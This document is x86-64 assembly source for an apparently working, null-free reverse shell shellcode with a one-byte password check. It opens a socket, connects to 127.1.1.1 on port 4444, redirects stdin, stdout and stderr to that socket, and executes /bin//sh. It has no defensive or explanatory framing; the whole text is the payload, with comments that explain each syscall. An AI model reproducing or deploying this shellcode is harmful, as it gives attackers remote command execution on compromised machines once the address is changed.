1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108 | global _start
section .text
_start:
jmp $+10
rev_data_struct: db 0x02, 0x01, 0x11, 0x5c, 0x7f, 0x01, 0x01, 0x01
shell:
; store data struct address in r8
lea r8, [rel rev_data_struct]
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rax, rax
mov al, 41
xor rdi, rdi
mov dil, 2
xor rsi, rsi
mov sil, 1
xor rdx, rdx
syscall
; copy socket descriptor to rdi for future use
mov rdi, rax
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.1.1.1")
; bzero(&server.sin_zero, 8)
; remove 0x1 by subtracting
sub byte [r8+1], 0x1
mov al, 42
mov rsi, r8
mov dl, 16
syscall
; duplicate sockets
; STDIN
mov al, 33
xor rsi, rsi
syscall
; STDOUT
mov al, 33
mov sil, 1
syscall
; STDERR
mov al, 33
mov sil, 2
syscall
;read password and store in first byte of r8
xor rax, rax
lea rsi, [r8]
mov dl, 1
syscall
; check password against expected password | , if fail jump out of bounds, should cause a segfault
cmp byte [rsi], 0x7C
jnz $+44
; execve
; First NULL push
xor rax, rax
push rax
; push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; set RDX
mov rdx, rsp
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
mov al, 59
syscall
|